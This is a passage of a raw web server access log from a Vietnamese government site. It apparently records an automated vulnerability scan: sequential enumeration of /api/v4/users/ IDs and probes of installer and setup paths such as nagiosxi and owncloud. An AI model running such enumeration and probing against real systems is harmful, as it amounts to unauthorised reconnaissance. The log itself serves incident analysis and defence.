- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:33:56 103.153.214.94 GET /api/v4/users/13 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:33:56 103.153.214.94 GET /api/v4/users/14 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:33:58 103.153.214.94 GET /api/v4/users/15 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:33:58 103.153.214.94 GET /api/v4/users/16 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 202 2023-10-15 01:34:00 103.153.214.94 GET /api/v4/users/17 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:34:01 103.153.214.94 GET /api/v4/users/18 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:34:03 103.153.214.94 GET /api/v4/users/19 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:34:05 103.153.214.94 GET /api/v4/users/20 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:34:05 103.153.214.94 GET /api/v4/users/21 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:34:07 103.153.214.94 GET /api/v4/users/22 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:34:09 103.153.214.94 GET /api/v4/users/23 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 209 2023-10-15 01:34:11 103.153.214.94 GET /api/v4/users/24 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:34:13 103.153.214.94 GET /api/v4/users/25 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:34:15 103.153.214.94 GET /api/v4/users/26 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:34:17 103.153.214.94 GET /api/v4/users/27 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:34:17 103.153.214.94 GET /api/v4/users/28 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:34:20 103.153.214.94 GET /api/v4/users/29 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 209 2023-10-15 01:34:20 103.153.214.94 GET /api/v4/users/30 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:34:23 103.153.214.94 GET /api/v4/users/31 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:34:25 103.153.214.94 GET /api/v4/users/32 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:34:27 103.153.214.94 GET /api/v4/users/33 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 222 2023-10-15 01:34:29 103.153.214.94 GET /api/v4/users/34 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212 2023-10-15 01:34:31 103.153.214.94 GET /api/v4/users/35 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:34:33 103.153.214.94 GET /api/v4/users/36 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 209 2023-10-15 01:34:35 103.153.214.94 GET /api/v4/users/37 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 216 2023-10-15 01:34:37 103.153.214.94 GET /api/v4/users/38 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212 2023-10-15 01:34:39 103.153.214.94 GET /api/v4/users/39 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 211 2023-10-15 01:34:41 103.153.214.94 GET /api/v4/users/40 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 203 2023-10-15 01:34:43 103.153.214.94 GET /api/v4/users/41 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:34:45 103.153.214.94 GET /api/v4/users/42 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:34:47 103.153.214.94 GET /api/v4/users/43 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:34:49 103.153.214.94 GET /api/v4/users/44 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:34:51 103.153.214.94 GET /api/v4/users/45 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:34:53 103.153.214.94 GET /api/v4/users/46 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 210 2023-10-15 01:34:55 103.153.214.94 GET /api/v4/users/47 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 211 2023-10-15 01:34:57 103.153.214.94 GET /api/v4/users/48 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 210 2023-10-15 01:34:59 103.153.214.94 GET /api/v4/users/49 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:01 103.153.214.94 GET /api/v4/users/50 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:35:03 103.153.214.94 GET /api/v4/users/51 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 210 2023-10-15 01:35:04 103.153.214.94 GET /api/v4/users/52 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:35:04 103.153.214.94 GET /api/v4/users/53 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 202 2023-10-15 01:35:06 103.153.214.94 GET /api/v4/users/54 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:06 103.153.214.94 GET /api/v4/users/55 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 203 2023-10-15 01:35:09 103.153.214.94 GET /api/v4/users/56 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:35:11 103.153.214.94 GET /api/v4/users/57 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:35:12 103.153.214.94 GET /api/v4/users/58 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:14 103.153.214.94 GET /api/v4/users/59 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:16 103.153.214.94 GET /api/v4/users/60 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:17 103.153.214.94 GET /api/v4/users/61 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 213 2023-10-15 01:35:17 103.153.214.94 GET /api/v4/users/62 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:35:19 103.153.214.94 GET /api/v4/users/63 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:20 103.153.214.94 GET /api/v4/users/64 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212 2023-10-15 01:35:20 103.153.214.94 GET /api/v4/users/65 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 219 2023-10-15 01:35:23 103.153.214.94 GET /api/v4/users/66 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:35:25 103.153.214.94 GET /api/v4/users/67 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:27 103.153.214.94 GET /api/v4/users/68 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:29 103.153.214.94 GET /api/v4/users/69 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:35:31 103.153.214.94 GET /api/v4/users/70 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:32 103.153.214.94 GET /api/v4/users/71 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:33 103.153.214.94 GET /api/v4/users/72 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:35:34 103.153.214.94 GET /api/v4/users/73 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212 2023-10-15 01:35:34 103.153.214.94 GET /api/v4/users/74 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:35:36 103.153.214.94 GET /api/v4/users/75 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:35:37 103.153.214.94 GET /api/v4/users/76 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:35:38 103.153.214.94 GET /api/v4/users/77 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:38 103.153.214.94 GET /api/v4/users/78 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:35:41 103.153.214.94 GET /api/v4/users/79 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 404 0 2 210 2023-10-15 01:35:43 103.153.214.94 GET /api/v4/users/80 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:35:45 103.153.214.94 GET /api/v4/users/81 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:35:47 103.153.214.94 GET /api/v4/users/82 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 209 2023-10-15 01:35:49 103.153.214.94 GET /api/v4/users/83 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 203 2023-10-15 01:35:51 103.153.214.94 GET /api/v4/users/84 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:35:53 103.153.214.94 GET /api/v4/users/85 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:35:56 103.153.214.94 GET /api/v4/users/86 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 966 2023-10-15 01:35:58 103.153.214.94 GET /api/v4/users/87 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:36:00 103.153.214.94 GET /api/v4/users/88 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:36:02 103.153.214.94 GET /api/v4/users/89 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:36:04 103.153.214.94 GET /api/v4/users/90 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:36:06 103.153.214.94 GET /api/v4/users/91 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 213 2023-10-15 01:36:08 103.153.214.94 GET /api/v4/users/92 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 207 2023-10-15 01:36:10 103.153.214.94 GET /api/v4/users/93 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 209 2023-10-15 01:36:12 103.153.214.94 GET /api/v4/users/94 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:36:14 103.153.214.94 GET /api/v4/users/95 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:36:16 103.153.214.94 GET /api/v4/users/96 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:36:18 103.153.214.94 GET /api/v4/users/97 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212 2023-10-15 01:36:20 103.153.214.94 GET /api/v4/users/98 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:36:20 103.153.214.94 GET /installer - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201 2023-10-15 01:36:22 103.153.214.94 GET /api/v4/users/99 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:36:24 103.153.214.94 GET /api/v4/users/100 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 208 2023-10-15 01:36:27 103.153.214.94 GET /clusterList - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 201 2023-10-15 01:37:27 103.153.214.94 GET /nagiosxi/install.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 207 2023-10-15 01:41:58 103.153.214.94 GET /clusters - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204 2023-10-15 01:42:02 103.153.214.94 GET /installer/installerUI.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 01:42:58 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 222 2023-10-15 01:43:01 103.153.214.94 GET /owncloud/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 622 2023-10-15 01:44:10 103.153.214.94 GET /Setup/index.php/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204 2023-10-15 01:50:51 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 202 2023-10-15 01:50:55 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:50:59 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:00 103.153.214.94 GET /install/app.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 202 2023-10-15 01:51:03 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:07 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:11 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:51:16 103.153.214.94 GET 